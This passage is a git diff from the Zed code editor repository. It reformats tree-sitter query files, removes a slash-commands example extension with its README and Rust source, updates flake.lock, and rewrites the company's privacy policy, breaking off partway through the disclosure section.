b/extensions/proto/extension.toml @@ -1,7 +1,7 @@ id = "proto" name = "Proto" description = "Protocol Buffers support." -version = "0.3.1" +version = "0.3.2" schema_version = 1 authors = ["Zed Industries "] repository = "https://github.com/zed-industries/zed" diff --git a/extensions/proto/languages/proto/highlights.scm b/extensions/proto/languages/proto/highlights.scm index 923e00bb1dfca30afcf41a6ab681846d8f20b900..f17c48127380a4c314f4d5b8498b16d4c9d85be6 100644 --- a/extensions/proto/languages/proto/highlights.scm +++ b/extensions/proto/languages/proto/highlights.scm @@ -52,11 +52,11 @@ "}" "<" ">" -] @punctuation.bracket +] @punctuation.bracket [ - ";" - "," + ";" + "," ] @punctuation.delimiter "=" @operator diff --git a/extensions/proto/languages/proto/indents.scm b/extensions/proto/languages/proto/indents.scm index acb44a5e1e617cc0d735228af022129c0b39d561..c096b82d2b2d6856bcb6c39bf44212507b605e38 100644 --- a/extensions/proto/languages/proto/indents.scm +++ b/extensions/proto/languages/proto/indents.scm @@ -1,3 +1,11 @@ -(_ "{" "}" @end) @indent -(_ "[" "]" @end) @indent -(_ "(" ")" @end) @indent +(_ + "{" + "}" @end) @indent + +(_ + "[" + "]" @end) @indent + +(_ + "(" + ")" @end) @indent diff --git a/extensions/proto/languages/proto/injections.scm b/extensions/proto/languages/proto/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..2f0e58eb6431515b86b6042e5828263341513e99 --- /dev/null +++ b/extensions/proto/languages/proto/injections.scm @@ -0,0 +1,2 @@ +((comment) @injection.content + (#set! 
injection.language "comment")) diff --git a/extensions/proto/languages/proto/outline.scm b/extensions/proto/languages/proto/outline.scm index f90b1bae33effade920bf8f2c76d7f2d187f1d8e..f0aa6eff9801cdbfe8f61395901cfb96806e10a7 100644 --- a/extensions/proto/languages/proto/outline.scm +++ b/extensions/proto/languages/proto/outline.scm @@ -1,19 +1,19 @@ (message - "message" @context - (message_name - (identifier) @name)) @item + "message" @context + (message_name + (identifier) @name)) @item (service - "service" @context - (service_name - (identifier) @name)) @item + "service" @context + (service_name + (identifier) @name)) @item (rpc - "rpc" @context - (rpc_name - (identifier) @name)) @item + "rpc" @context + (rpc_name + (identifier) @name)) @item (enum - "enum" @context - (enum_name - (identifier) @name)) @item + "enum" @context + (enum_name + (identifier) @name)) @item diff --git a/extensions/proto/languages/proto/textobjects.scm b/extensions/proto/languages/proto/textobjects.scm index 90ea84282da39df8a2023108c367c3ef76a0ef9a..7e859c0d65bd5d119b616d626f3d88ee6d1fc6ee 100644 --- a/extensions/proto/languages/proto/textobjects.scm +++ b/extensions/proto/languages/proto/textobjects.scm @@ -1,17 +1,21 @@ -(message (message_body +(message + (message_body "{" (_)* @class.inside "}")) @class.around -(enum (enum_body + +(enum + (enum_body "{" (_)* @class.inside "}")) @class.around + (service - "service" - (_) - "{" - (_)* @class.inside - "}") @class.around + "service" + (_) + "{" + (_)* @class.inside + "}") @class.around (rpc) @function.around diff --git a/extensions/slash-commands-example/Cargo.toml b/extensions/slash-commands-example/Cargo.toml deleted file mode 100644 index 03b22af254ab3190f2dbfca04976c89b9a37e995..0000000000000000000000000000000000000000 --- a/extensions/slash-commands-example/Cargo.toml +++ /dev/null @@ -1,16 +0,0 @@ -[package] -name = "slash_commands_example" -version = "0.1.0" -edition.workspace = true -publish.workspace = true -license = "Apache-2.0" 
- -[lints] -workspace = true - -[lib] -path = "src/slash_commands_example.rs" -crate-type = ["cdylib"] - -[dependencies] -zed_extension_api = "0.1.0" diff --git a/extensions/slash-commands-example/README.md b/extensions/slash-commands-example/README.md deleted file mode 100644 index 8c16a4e168a3334d3197090837eeaf21c956b3c3..0000000000000000000000000000000000000000 --- a/extensions/slash-commands-example/README.md +++ /dev/null @@ -1,84 +0,0 @@ -# Slash Commands Example Extension - -This is an example extension showcasing how to write slash commands. - -See: [Extensions: Slash Commands](https://zed.dev/docs/extensions/slash-commands) in the Zed Docs. - -## Pre-requisites - -[Install Rust Toolchain](https://www.rust-lang.org/tools/install): - -```sh -curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -``` - -## Setup - -```sh -git clone https://github.com/zed-industries/zed.git -cp -RL zed/extensions/slash-commands-example . - -cd slash-commands-example/ - -# Update Cargo.toml to make it standalone -cat > Cargo.toml << EOF -[package] -name = "slash_commands_example" -version = "0.1.0" -edition = "2021" -license = "Apache-2.0" - -[lib] -path = "src/slash_commands_example.rs" -crate-type = ["cdylib"] - -[dependencies] -zed_extension_api = "0.1.0" -EOF - -curl -O https://raw.githubusercontent.com/rust-lang/rust/master/LICENSE-APACHE -echo "# Zed Slash Commands Example Extension" > README.md -echo "Cargo.lock" > .gitignore -echo "target/" >> .gitignore -echo "*.wasm" >> .gitignore - -git init -git add . -git commit -m "Initial commit" - -cd .. -mv slash-commands-example MY-SUPER-COOL-ZED-EXTENSION -zed $_ -``` - -## Installation - -1. Open the command palette (`cmd-shift-p` or `ctrl-shift-p`). -2. Launch `zed: install dev extension` -3. Select the extension folder created above - -## Test - -Open the assistant and type `/echo` and `/pick-one` at the beginning of a line. 
- -## Customization - -Open the `extensions.toml` file and set the `id`, `name`, `description`, `authors` and `repository` fields. - -Rename `slash-commands-example.rs` you'll also have to update `Cargo.toml` - -## Rebuild - -Rebuild to see these changes reflected: - -1. Open Zed Extensions (`cmd-shift-x` or `ctrl-shift-x`). -2. Click `Rebuild` next to your Dev Extension (formerly "Slash Command Example") - -## Troubleshooting / Logs - -- [zed.dev docs: Troubleshooting](https://zed.dev/docs/troubleshooting) - -## Documentation - -- [zed.dev docs: Extensions: Developing Extensions](https://zed.dev/docs/extensions/developing-extensions) -- [zed.dev docs: Extensions: Slash Commands](https://zed.dev/docs/extensions/slash-commands) diff --git a/extensions/slash-commands-example/extension.toml b/extensions/slash-commands-example/extension.toml deleted file mode 100644 index 888c776d0111bdc5f99e87967f0cff6e0c91b2b3..0000000000000000000000000000000000000000 --- a/extensions/slash-commands-example/extension.toml +++ /dev/null @@ -1,15 +0,0 @@ -id = "slash-commands-example" -name = "Slash Commands Example" -description = "An example extension showcasing slash commands." 
-version = "0.1.0" -schema_version = 1 -authors = ["Zed Industries "] -repository = "https://github.com/zed-industries/zed" - -[slash_commands.echo] -description = "echoes the provided input" -requires_argument = true - -[slash_commands.pick-one] -description = "pick one of three options" -requires_argument = true diff --git a/extensions/slash-commands-example/src/slash_commands_example.rs b/extensions/slash-commands-example/src/slash_commands_example.rs deleted file mode 100644 index 5b170d63ee38c4dd173ddc2856c858755150490e..0000000000000000000000000000000000000000 --- a/extensions/slash-commands-example/src/slash_commands_example.rs +++ /dev/null @@ -1,90 +0,0 @@ -use zed_extension_api::{ - self as zed, SlashCommand, SlashCommandArgumentCompletion, SlashCommandOutput, - SlashCommandOutputSection, Worktree, -}; - -struct SlashCommandsExampleExtension; - -impl zed::Extension for SlashCommandsExampleExtension { - fn new() -> Self { - SlashCommandsExampleExtension - } - - fn complete_slash_command_argument( - &self, - command: SlashCommand, - _args: Vec, - ) -> Result, String> { - match command.name.as_str() { - "echo" => Ok(vec![]), - "pick-one" => Ok(vec![ - SlashCommandArgumentCompletion { - label: "Option One".to_string(), - new_text: "option-1".to_string(), - run_command: true, - }, - SlashCommandArgumentCompletion { - label: "Option Two".to_string(), - new_text: "option-2".to_string(), - run_command: true, - }, - SlashCommandArgumentCompletion { - label: "Option Three".to_string(), - new_text: "option-3".to_string(), - run_command: true, - }, - ]), - command => Err(format!("unknown slash command: \"{command}\"")), - } - } - - fn run_slash_command( - &self, - command: SlashCommand, - args: Vec, - _worktree: Option<&Worktree>, - ) -> Result { - match command.name.as_str() { - "echo" => { - if args.is_empty() { - return Err("nothing to echo".to_string()); - } - - let text = args.join(" "); - - Ok(SlashCommandOutput { - sections: vec![SlashCommandOutputSection { - 
range: (0..text.len()).into(), - label: "Echo".to_string(), - }], - text, - }) - } - "pick-one" => { - let Some(selection) = args.first() else { - return Err("no option selected".to_string()); - }; - - match selection.as_str() { - "option-1" | "option-2" | "option-3" => {} - invalid_option => { - return Err(format!("{invalid_option} is not a valid option")); - } - } - - let text = format!("You chose {selection}."); - - Ok(SlashCommandOutput { - sections: vec![SlashCommandOutputSection { - range: (0..text.len()).into(), - label: format!("Pick One: {selection}"), - }], - text, - }) - } - command => Err(format!("unknown slash command: \"{command}\"")), - } - } -} - -zed::register_extension!(SlashCommandsExampleExtension); diff --git a/extensions/test-extension/languages/gleam/highlights.scm b/extensions/test-extension/languages/gleam/highlights.scm index 4b85b88d0151a1bfe9018f0c526497261d6e1801..50de3a6acbe6a8b65340d288334aa7185afc8609 100644 --- a/extensions/test-extension/languages/gleam/highlights.scm +++ b/extensions/test-extension/languages/gleam/highlights.scm @@ -1,6 +1,8 @@ ; Comments (module_comment) @comment + (statement_comment) @comment + (comment) @comment ; Constants @@ -9,43 +11,61 @@ ; Variables (identifier) @variable + (discard) @comment.unused ; Modules (module) @module -(import alias: (identifier) @module) + +(import + alias: (identifier) @module) + (remote_type_identifier module: (identifier) @module) + (remote_constructor_name module: (identifier) @module) + ((field_access record: (identifier) @module field: (label) @function) - (#is-not? local)) + (#is-not? 
local)) ; Functions -(unqualified_import (identifier) @function) -(unqualified_import "type" (type_identifier) @type) -(unqualified_import (type_identifier) @constructor) +(unqualified_import + (identifier) @function) + +(unqualified_import + "type" + (type_identifier) @type) + +(unqualified_import + (type_identifier) @constructor) + (function name: (identifier) @function) + (external_function name: (identifier) @function) + (function_parameter name: (identifier) @variable.parameter) + ((function_call - function: (identifier) @function) - (#is-not? local)) + function: (identifier) @function) + (#is-not? local)) + ((binary_expression - operator: "|>" - right: (identifier) @function) - (#is-not? local)) + operator: "|>" + right: (identifier) @function) + (#is-not? local)) ; "Properties" ; Assumed to be intended to refer to a name for a field; something that comes ; before ":" or after "." ; e.g. record field names, tuple indices, names for named arguments, etc (label) @property + (tuple_access index: (integer) @property) @@ -54,10 +74,12 @@ "@" @attribute name: (identifier) @attribute) -(attribute_value (identifier) @constant) +(attribute_value + (identifier) @constant) ; Type names (remote_type_identifier) @type + (type_identifier) @type ; Data constructors @@ -65,19 +87,24 @@ ; Literals (string) @string + ((escape_sequence) @warning - ; Deprecated in v0.33.0-rc2: - (#eq? @warning "\\e")) + ; Deprecated in v0.33.0-rc2: + (#eq? @warning "\\e")) + (escape_sequence) @string.escape + (bit_string_segment_option) @function.builtin + (integer) @number + (float) @number ; Reserved identifiers ; TODO: when tree-sitter supports `#any-of?` in the Rust bindings, ; refactor this to use `#any-of?` rather than `#match?` ((identifier) @warning - (#match? @warning "^(auto|delegate|derive|else|implement|macro|test|echo)$")) + (#match? 
@warning "^(auto|delegate|derive|else|implement|macro|test|echo)$")) ; Keywords [ @@ -102,8 +129,12 @@ ; Operators (binary_expression operator: _ @operator) -(boolean_negation "!" @operator) -(integer_negation "-" @operator) + +(boolean_negation + "!" @operator) + +(integer_negation + "-" @operator) ; Punctuation [ @@ -116,10 +147,11 @@ "<<" ">>" ] @punctuation.bracket + [ "." "," - ;; Controversial -- maybe some are operators? + ; Controversial -- maybe some are operators? ":" "#" "=" diff --git a/extensions/test-extension/languages/gleam/indents.scm b/extensions/test-extension/languages/gleam/indents.scm index 112b414aa45f277138d0c681851129a608ee96e0..92f1a04d86d34d60763cceb872c5ac1004ba4601 100644 --- a/extensions/test-extension/languages/gleam/indents.scm +++ b/extensions/test-extension/languages/gleam/indents.scm @@ -1,3 +1,11 @@ -(_ "[" "]" @end) @indent -(_ "{" "}" @end) @indent -(_ "(" ")" @end) @indent +(_ + "[" + "]" @end) @indent + +(_ + "{" + "}" @end) @indent + +(_ + "(" + ")" @end) @indent diff --git a/extensions/test-extension/languages/gleam/outline.scm b/extensions/test-extension/languages/gleam/outline.scm index 5df7a6af800e8e3c9f0b00834576f2e059bd12b0..2d1a7d800fb9c662f41a0a865e492716b876f2fd 100644 --- a/extensions/test-extension/languages/gleam/outline.scm +++ b/extensions/test-extension/languages/gleam/outline.scm @@ -1,31 +1,31 @@ (external_type - (visibility_modifier)? @context - "type" @context - (type_name) @name) @item + (visibility_modifier)? @context + "type" @context + (type_name) @name) @item (type_definition - (visibility_modifier)? @context - (opacity_modifier)? @context - "type" @context - (type_name) @name) @item + (visibility_modifier)? @context + (opacity_modifier)? @context + "type" @context + (type_name) @name) @item (data_constructor - (constructor_name) @name) @item + (constructor_name) @name) @item (data_constructor_argument - (label) @name) @item + (label) @name) @item (type_alias - (visibility_modifier)? 
@context - "type" @context - (type_name) @name) @item + (visibility_modifier)? @context + "type" @context + (type_name) @name) @item (function - (visibility_modifier)? @context - "fn" @context - name: (_) @name) @item + (visibility_modifier)? @context + "fn" @context + name: (_) @name) @item (constant - (visibility_modifier)? @context - "const" @context - name: (_) @name) @item + (visibility_modifier)? @context + "const" @context + name: (_) @name) @item diff --git a/flake.lock b/flake.lock index ce974047d69a0c752fbc729448c24ddfc170ae77..c32629aedd533082e43ea3667f1b9cdc6dccfd1b 100644 --- a/flake.lock +++ b/flake.lock @@ -79,11 +79,11 @@ ] }, "locked": { - "lastModified": 1770001842, - "narHash": "sha256-ZAyTeILfdWwDp1nuF0RK3McBduMi49qnJvrS+3Ezpac=", + "lastModified": 1775013181, + "narHash": "sha256-zPrt6oNM1r/RO5bWYaZ3hthfG9vzkr6kQdoqDd5x4Qw=", "owner": "oxalica", "repo": "rust-overlay", - "rev": "5018343419ea808f8a413241381976b7e60951f2", + "rev": "e8046c1d9ccadd497c2344d8fa49dab62f22f7be", "type": "github" }, "original": { diff --git a/legal/privacy-policy.md b/legal/privacy-policy.md index eaf8ece78160e7f643b1fd646e42a71432aafbd0..1eacc5273c93f5035579a72fe5241beca7e3718f 100644 --- a/legal/privacy-policy.md +++ b/legal/privacy-policy.md @@ -3,266 +3,178 @@ title: Privacy Policy slug: privacy-policy --- -At Zed Industries, Inc. ("Zed", "Company" or "we"), we take privacy and the security of data seriously. This Privacy Policy is established to help advise you about how we treat your personal data. By using or accessing our website located at zed.dev, or the Solution or services available pursuant the Zed End User Terms located at [https://zed.dev/terms](https://zed.dev/terms) (collectively, the "Services"), you acknowledge awareness of the practices and policies outlined below, and hereby consent that we will collect, use, and share your personal data as described in this Privacy Policy. 
+**Last Updated**: March 2, 2026 -As we grow and expand our Services, we may modify this Privacy Policy from time to time. When material modifications are made, we will alert you to any such changes by placing a notice on the Company website, by sending you an email and/or by some other means. Please note that if you've opted not to receive legal notice emails from us (or haven't provided us with a valid email address), those legal notices will still govern your use of the Services. If you use the Services after any changes to the Privacy Policy have been published on our website, you consent and agree to all of the changes. +## Summary -## What this Privacy Policy Covers +Zed collects user information (name, email, username, IP address, etc.), device and usage data, and web analytics to improve our products and services, as well as payment details if you subscribe. We do not store your source code and we process but do not store audio/video/screenshare from collaboration sessions. -Our Privacy Policy covers how we treat Personal Data that we gather when you access or use our Services. "Personal Data" means information that identifies or relates to a particular individual and includes information referred to as "personally identifiable information" or "personal information" under applicable data privacy laws, rules or regulations. Our Privacy Policy does not cover the practices of companies we don't own or control or people we don't manage. +- **We don't sell your data and we don't allow AI providers to train on it** +- **You control Zed editor telemetry** — disable it in Settings or learn more at [https://zed.dev/docs/telemetry](/telemetry) +- **We honor Global Privacy Control** (GPC) signals from your browser +- To access, correct, or delete your data, email privacy@zed.dev with subject "Privacy Request" -## Personal Data +Questions? Contact us at privacy@zed.dev. The full policy below contains complete details. 
-### Categories of Personal Data We Collect +## Introduction -This chart details the categories of Personal Data that we collect and have collected over the past 12 months: +This Privacy Policy explains how Zed Industries, Inc. ("**Zed**," "**we**," "**our**," or "**us**") collects, uses, and shares your personal data when you use our websites (including [https://zed.dev](https://zed.dev)), our downloadable software ("**Software**"), our subscription service ("**Service**"), or otherwise interact with us. -| Category of personal data | Examples of data we collect | Categories of third parties with whom we share this data | -| ----------------------------- | ------------------------------------------------------------- | -------------------------------------------------------- | -| Profile or contact data | First and last name
Email address
GitHub username | Cloud infrastructure providers
Analytics providers | -| IP data | IP address & derived geolocation data | Cloud infrastructure providers
Analytics providers | -| Web analytics | Interactions
Referrer
Request IDs
Statistics | Cloud infrastructure providers
Analytics providers | -| Photos, videos and recordings | Screenshots
Videos and video recordings you share with us | Cloud infrastructure providers | -| Audio, screenshare data | Audio and screen sharing during collaboration calls | Cloud infrastructure providers | +As used in this Privacy Policy, “personal data” means any information relating to an identified or identifiable individual and includes any information that constitutes "personally identifiable information," “personal data,” or "personal information" under applicable privacy or data protection laws or regulations. -Note that "collection" does not necessarily imply long-term storage. +You acknowledge the collection, use, disclosure, procedures, and other processing described in this Privacy Policy. Beyond the Privacy Policy, your use of our products and services is also subject to our Terms of Service included alongside. This Privacy Policy does not apply to the extent we process personal data in the role of a processor or service provider on behalf of our Zed Business customers. Such processing is governed by our Data Processing Agreement, available upon request. For information about the sub-processors we engage in that capacity, see [https://zed.dev/subprocessors](/subprocessors). -### Categories of Sources of Personal Data - -We collect Personal Data about you from the following categories of sources: - -#### You - -- When you provide such information directly to us. Examples include: - - When you create an account - - When you voluntarily provide information through our Services or through responses to surveys or questionnaires. - - When you send us an email or otherwise contact us. - - When you sign up to our mailing list. -- When you use our hosted Services and such information is collected automatically. Examples include: - - Cookies (defined in the "Tracking Tools and Opt-Out" section below). -- When you use the client software we provide on your machine. Examples include: - - Authentication information when you sign in. 
- - Version and system metadata when the software checks for updates. - - Usage data, unless you opt out. - - Crash reports, unless you opt out. - - When you make requests to language models we host for you. - - Zed does not store or train on your requests without consent. - - Other relevant data necessary to provide you with our Services. - -#### Third Parties +## Personal Data We Collect -- When you login to the service using a third-party service like GitHub. -- Information collected by content delivery networks or similar service providers -- We may use analytics providers to analyze how you interact and engage with the Services, or third parties may help us provide you with customer support. +We may collect personal data from or about you and your devices from the sources and in the manner described below. If you do not provide requested data, some features may not work - either because we need that data to deliver them, or because we're legally required to collect it. -## Our Business Purposes for Collecting or Disclosing Personal Data +For authorized users on Zed Business plans, certain data described in this section may be processed by Zed as a data processor on behalf of the Zed Business customer. In those cases, the Zed Business customer determines the purposes and lawful basis for that processing, as set forth in our Data Processing Agreement. -- Providing, Customizing and Improving the Services - - Creating and managing your account or other user profiles. - - Processing orders or other fee-based transactions; billing. - - Providing you with the products, services or information you request. - - Meeting or fulfilling the reason you provided the information to us. - - Providing support and assistance for the Services. - - Improving the Services, including testing, research, internal analytics and product development. - - Doing fraud protection, security and debugging. 
- - Carrying out other business purposes stated when collecting your Personal Data or as otherwise set forth in applicable data privacy laws. -- Marketing the Services - - Marketing and selling the Services. -- Corresponding with You - - Responding to correspondence that we receive from you, contacting you when necessary or requested, and sending you information about Zed or our Services. - - Sending emails and other communications according to your preferences or that display content that we think will interest you. -- Meeting Legal Requirements and Enforcing Legal Terms - - Fulfilling our legal obligations under applicable law, regulation, court order or other legal process, such as preventing, detecting and investigating security incidents and potentially illegal or prohibited activities. - - Protecting the rights, property or safety of you, Zed or another party. - - Enforcing any agreements with you. - - Responding to claims that any posting or other content violates third-party rights. - - Resolving disputes. +### Personal Data You Provide to Us -We will not collect additional categories of Personal Data or use the Personal Data we collected for materially different, unrelated or incompatible purposes without providing you notice as is described above. +- **Contact Information** - We may collect your personal data when you inquire about Zed, our products and services, or when you otherwise interact with us, including when you sign up for, attend, or take part in our demos, events, or webinars. This data may include your full name, work email, company name, company size, and any other data you share with us. -## How We Disclose Your Personal Data +- **Communications** - When you contact us directly, we may receive personal data about you, such as your name, email address, message contents and attachments, and - if you join a live collaboration session - we process, but do not store, your audio and shared screen. 
When you sign up for news and updates, we will collect your email address and any other data you share. When you communicate with us online, our third-party vendors may receive and store these communications on our behalf. Our emails may include tracking pixels to track information about how you interact with our emails, such as whether you open them and whether you access any included links, your approximate Location Information (described below) based on your IP address, and Device Information (described below), to improve our website, products, and services. -We disclose your Personal Data to categories of service providers and other parties listed in this section. Some of these disclosures may constitute a "sale" of your Personal Data as defined under applicable laws. For more information, please refer to the state-specific sections below. +- **Account Information** - When you create an Account with Zed, we collect the data you provide to create, update, or manage your Service account. Examples include: your name, username, and email address. -- Service Providers. These parties help us provide the Services or perform business functions on our behalf. They include: - - Hosting, technology and communication providers. - - Providers of artificial intelligence or machine learning models - - Payment processors. - - If you are using our Services on a fee-basis, our payment processing partner Stripe, Inc. ("Stripe") collects your voluntarily-provided payment card information necessary to process your payment. - - Please see Stripe Terms of Service and Stripe Privacy Policy for information on its use and storage of your Personal Data. -- Analytics Partners. These parties provide analytics on web traffic or usage of the Services. They include: - - Companies that track how users found or were referred to the Services. - - Companies that track how users interact with the Services. -- Authorized authentication providers (e.g. 
GitHub OAuth) +- **Careers** - If you apply for a job with us, you may submit your contact information and your resume online. We will collect any information you choose to provide on your resume, such as your contact information, education, and employment experience. -### Fulfilling Legal Obligations +- **Payment Information** - If you make a payment, your payment details, such as credit card, address, phone number, or other financial information, are collected by our third-party payment processor on our behalf. Zed does not collect, process, or store your payment information directly. -We may share any Personal Data that we collect with third parties in relation to the activities set forth under "Meeting Legal Requirements and Enforcing Legal Terms" in the "Our Business Purposes for Collecting Personal Data" section above. +- **Regarding Third-Party Services** - If you use or integrate third-party tools or link third-party services with the Software or Service, we may receive personal data about you, such as your [GitHub username and other related information](https://docs.github.com/en/apps/oauth-apps/using-oauth-apps/connecting-with-third-party-applications) that permits us to authenticate your user identity and keep your account secure. You can learn more about Zed Third Parties here: [https://zed.dev/](https://zed.dev/acceptable-use-policies)[acceptable-use-policies](/acceptable-use-policies) -### Business Transfers +### Personal Data We Collect When You Use Our Websites, Software, or Service -Personal Data collected may be transferred to a third party if we undergo a merger, acquisition, bankruptcy or other transaction in which such third party assumes control of our business (in whole or in part). In such an event, we will make reasonable efforts to notify you before your information becomes subject to different privacy and security policies and practices as authorized or mandated by applicable law. 
+- **Website, Software, and Service Telemetry** - We automatically collect telemetry - technical logs, metrics, and usage data - to improve and support Zed’s websites, Software, and Service. You may opt out of local telemetry collection in the Software settings. However, when you sign into or use the websites or Service (including via the Software) we collect telemetry on our servers related to use of the websites and Service. -## Data that is Not Personal Data +Learn more about telemetry and your choices and how to opt out of Software telemetry collection at [https://zed.dev/docs/telemetry](/telemetry) -We may create aggregated, de-identified or anonymized data from the Personal Data we collect, including by removing information that makes the data personally identifiable to a particular user. We may use such aggregated, de-identified or anonymized data and share it with third parties for our lawful business purposes, including to analyze, build and improve the Services and promote our business, provided that we will not share such data in a manner that could identify you. +- **Device and Location Information** - When you use the website, Software, or Service we may collect information about your device and software, including IP address (and inferred approximate location), device type, device identifiers, browser (type, version, user-agent, and language), and operating system or mobile device type. We do so to support improving and securing the Software and Service. Zed does not collect precise location information. -## Tracking Tools and Opt-Out +- **Usage Information** - We automatically collect information about how you use our website and Service, like the pages or other content you view and the dates and times of your visits. We do so to support improving and securing the websites, Software, and Service. 
-The Services use cookies and similar technologies such as pixel tags, web beacons, clear GIFs and JavaScript (collectively, "Cookies") to enable our servers to recognize your web browser, tell us how and when you visit and use our Services, analyze trends, learn about our user base and operate and improve our Services. Cookies are small pieces of data– usually text files – placed on your computer, tablet, phone or similar device when you use that device to access our Services. We may also supplement the information we collect from you with information received from third parties, including third parties that have placed their own Cookies on your device(s). +- **Information from Cookies and Similar Technologies** - We and our third-party partners may collect information using cookies, beacons, and similar technologies (collectively “**Cookies**”) to provide functionality and to recognize you across visits. See our [Cookie Policy](/cookie-policy), which includes information on how to control or opt out of these Cookies. -### We use the following types of Cookies: +## How We Use the Personal Data We Collect -- Essential Cookies. Essential Cookies are required for providing you with features or services that you have requested. For example, certain Cookies enable you to log into secure areas of our Services. Disabling these Cookies may make certain features and services unavailable. -- Functional Cookies. Functional Cookies are used to record your choices and settings regarding our Services, maintain your preferences over time and recognize you when you return to our Services. These Cookies help us to personalize our content for you, greet you by name and remember your preferences (for example, your choice of language or region). -- Performance/Analytical Cookies. Performance/Analytical Cookies allow us to understand how visitors use our Services. 
They do this by collecting information about the number of visitors to the Services, what pages visitors view on our Services and how long visitors are viewing pages on the Services. Performance/Analytical Cookies also help us measure the performance of our advertising campaigns to help us improve our campaigns and Services' content for those who engage with our advertising. +We use the personal data we collect: -You can decide whether or not to accept Cookies through your internet browser's settings. Most browsers have an option for turning off the Cookie feature, which will prevent your browser from accepting new Cookies, as well as (depending on the sophistication of your browser software) allow you to decide on acceptance of each new Cookie in a variety of ways. You can also delete all Cookies that are already on your device. If you do this, however, you may have to manually adjust some preferences every time you visit our website and some of the Services and functionalities may not work. +- To deliver and improve our products: Providing the Software and Service functionality you request, debugging issues, and developing new features based on usage patterns; -To find out more information about Cookies generally, including information about how to manage and delete Cookies, please visit [https://allaboutcookies.org/](https://allaboutcookies.org/) or [https://ico.org.uk/for-the-public/online/cookies/](https://ico.org.uk/for-the-public/online/cookies/) if you are located in the European Union. 
+- To communicate with you: Responding to support requests, sending service announcements, and (with your consent) marketing communications; -## Data Security +- To secure our services: Detecting and preventing fraud, abuse, and security threats; -We endeavor to protect your Personal Data from unauthorized access, use and disclosure using appropriate physical, technical, organizational and administrative security measures based on our Services,the type of Personal Data being collected and how we are processing that data. You should also help protect your data by selecting and protecting your password and/or other sign-on mechanism(s) with care; limiting access to your computer or device and browser; and signing off after you have finished accessing your account. Although we work to protect the security of your account and other data that we hold in our records, be aware that no method of transmitting data over the internet or storing data is completely secure. +- To meet legal obligations: Complying with tax, accounting, and regulatory requirements; -## Data Retention +- To process payments: Completing transactions through our payment processor; and -We retain Personal Data about you for as long as reasonably necessary to provide you with our Services or otherwise in support of our business or commercial purposes for utilization of your Personal Data, as expressed. When establishing a retention period for particular categories of data, we consider who we collected the data from, our need for the Personal Data, why we collected the Personal Data, and the sensitivity of the Personal Data. In some cases we retain Personal Data for a longer period, if doing so is necessary to comply with our legal obligations, resolve disputes or collect fees owed, or as is otherwise permitted or required by applicable law, rule or regulation. We may further retain information in an anonymous or aggregated form where such information would not identify you personally. 
+- To understand aggregate usage: Generating anonymized statistics to guide product decisions. -For example: +We do not use your personal data for purposes materially different from those described above without providing you notice and, where required by law, obtaining your consent. -- We retain your profile information and credentials for as long as you have an account with us. -- We retain your payment data for as long as we need to process your purchase or subscription. -- We retain your device/IP data for as long as we need it to ensure that our systems are working appropriately, effectively and efficiently. +## Legal Bases for Processing European Personal Data -It's worth noting that we avoid retaining data unless necessary to provide our Service. For example: +If you are located in the European Economic Area (“**EEA**”) or the United Kingdom (“**UK**”), we only process your personal data when we have a valid “legal basis,” including as set forth below. -- We do not currently store source code that we proxy during collaboration sessions. -- We do not currently store audio or video recordings of Collaboration calls handled by LiveKit. +- **Consent** - We may process your personal data where you have consented to certain processing of your personal data. For example, we may process your personal data to send you marketing communications or to use Cookies where you have consented to such use. -## Personal Data of Children +- **Contractual Necessity** - We may process your personal data where required to provide you with our products and services. For example, we may need to process your personal data to respond to your inquiries or requests. -We do not knowingly collect or solicit Personal Data from children under 13 years of age; if you are a child under the age of 13, please do not attempt to register for or otherwise use the Services or send us any Personal Data. 
If we learn we have collected Personal Data from a child under 13 years of age, we will delete that information as quickly as possible. If you believe that a child under 13 years of age may have provided Personal Data to us, please contact us at hi@zed.dev. +- **Compliance with a Legal Obligation** - We may process your personal data where we have a legal obligation to do so. For example, we may process your personal data to comply with tax, labor and accounting obligations. -## California Resident Rights +- **Legitimate Interests** - We may process your personal data where we or a third party have a legitimate interest in processing your personal data. Specifically, we have a legitimate interest in using your personal data for product development and internal analytics purposes, and otherwise to improve the safety, security, and performance of our products and services. We only rely on our or a third party’s legitimate interests to process your personal data when these interests are not overridden by your rights and interests. -If you are a California resident, you have the rights set forth in this section. Please see the "Exercising Your Rights" section below for instructions regarding how to exercise these rights. Please note that we may process Personal Data of our customers' end users or employees in connection with our provision of certain services to our customers. If we are processing your Personal Data as a service provider, you may contact the entity that collected your Personal Data in the first instance to address your rights with respect to such data as desired. +## How We Disclose the Personal Data We Collect -If there are any conflicts between this section and any other provision of this Privacy Policy and you are a California resident, the portion that is more protective of Personal Data shall control to the extent of such conflict. 
If you have any questions about this section or whether any of the following rights apply to you, please contact us at hi@zed.dev. +The disclosures described below relate to Zed’s processing as a data controller. When we process data on behalf of Zed Business customers as a data processor, some of the third-parties described below may act as sub-processors under our Data Processing Agreement. -### Access +- **Zed does not sell your personal data to third-parties**.  We also do not share your data with third-parties for the purposes of cross-context advertising. -You have the right to request certain information about our collection and use of your Personal Data over the past 12 months. In response, we will provide you with the following information: +- **Partners and Affiliates** - We may share information we receive to our current or future affiliates (companies under common ownership with Zed) for any of the lawful business purposes described in this Privacy Policy above. -- The categories of Personal Data that we have collected about you. -- The categories of sources from which that Personal Data was collected. -- The business or commercial purpose for collecting or selling your Personal Data. -- The categories of third parties with whom we have shared your Personal Data. -- The specific pieces of Personal Data that we have collected about you. -- If we have disclosed your Personal Data to any third parties for a business purpose over the past 12 months, we will identify the categories of Personal Data shared with each category of third party recipient. If we have sold your Personal Data over the past 12 months, we will identify the categories of Personal Data sold to each category of third party recipient. 
+- **Vendors and Service Providers** - We may disclose information we receive to vendors and service providers retained in connection with operating, maintaining, or monitoring our websites, products, and services for any of the lawful business purposes described in this Privacy Policy above. -### Deletion +- **AI Service Providers** - We may disclose information we receive to vendors that provide artificial intelligence services in connection with our websites, software, or services for legitimate business purposes only, including website performance monitoring and sales and marketing of our products and services. Zed does not utilize third-party services which use this information for AI training purposes. -You have the right to request that we delete the Personal Data that we have collected about you. Under the CCPA, this right is subject to certain exceptions: for e.g., we may need to retain your Personal Data to provide you with the Services or complete a transaction or other action you may have requested, or if deletion of your Personal Data involves disproportionate effort to achieve. If your deletion request is subject to one of these exceptions, we may deny your deletion request to such data. +- **Web Analytics** - We use analytics services such as Amplitude to collect and process certain analytics data related to your use of our websites. These services utilize first-party cookies to collect information about your use of our websites, apps, and online resources via HTTP referrer and/or depending on your choices regarding cookies. Zed does not use 